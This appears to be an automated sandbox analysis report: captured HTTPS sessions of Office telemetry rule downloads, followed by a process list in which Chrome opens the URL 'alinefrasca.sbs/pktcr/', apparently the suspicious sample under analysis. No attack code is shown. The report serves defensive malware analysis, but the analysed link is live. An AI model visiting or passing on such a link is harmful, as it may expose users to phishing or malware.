                                                                            x-azure-ref: 20241028T083722Z-17c5cb586f6r59nt869u8w8xt800000003n000000000a94e
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            143192.168.2.44991713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:22 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:22 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1427
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                            ETag: "0x8DC582BE56F6873"
                                                                            x-ms-request-id: 08f6a26f-f01e-0071-6b1c-27431c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083722Z-16849878b785dznd7xpawq9gcn000000068g0000000014x3
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            144192.168.2.44991413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:22 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:22 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1360
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                            x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083722Z-16849878b78nx5sne3fztmu6xc00000005sg000000005x9r
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            145192.168.2.44991513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:22 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:22 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1397
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                            ETag: "0x8DC582BDFD43C07"
                                                                            x-ms-request-id: 27230864-a01e-0070-6533-26573b000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083722Z-17c5cb586f6zrq5bnguxgu7frc00000005ng0000000003df
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            146192.168.2.44992313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:23 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:23 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:23 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1366
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                            ETag: "0x8DC582BDF1E2608"
                                                                            x-ms-request-id: 44c445c3-601e-003e-0f9c-273248000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083723Z-15b8d89586fqj7k5h9gbd8vs9800000005y00000000050u7
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            147192.168.2.44992113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:23 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:23 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:23 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1354
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                            ETag: "0x8DC582BE0662D7C"
                                                                            x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083723Z-16849878b78fssff8btnns3b1400000005400000000033ar
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:23 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            148192.168.2.44992213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:23 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:23 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:23 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1403
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                            ETag: "0x8DC582BDCDD6400"
                                                                            x-ms-request-id: b03ac640-101e-007a-1bc8-27047e000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083723Z-17c5cb586f6vcw6vtg5eymp4u800000002xg000000002qrc
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:23 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            149192.168.2.44991913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:23 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:23 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:23 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1364
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                            ETag: "0x8DC582BEB6AD293"
                                                                            x-ms-request-id: ded904a3-601e-000d-0f3d-262618000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083723Z-17c5cb586f6gkqkwd0x1ge8t04000000055g000000000net
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:23 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:04:36:03
                                                                            Start date:28/10/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                            Imagebase:0x7ff76e190000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:2
                                                                            Start time:04:36:04
                                                                            Start date:28/10/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2296,i,4055844674821034473,7721358641859555857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                            Imagebase:0x7ff76e190000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:04:36:09
                                                                            Start date:28/10/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://alinefrasca.sbs/pktcr/"
                                                                            Imagebase:0x7ff76e190000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            No disassembly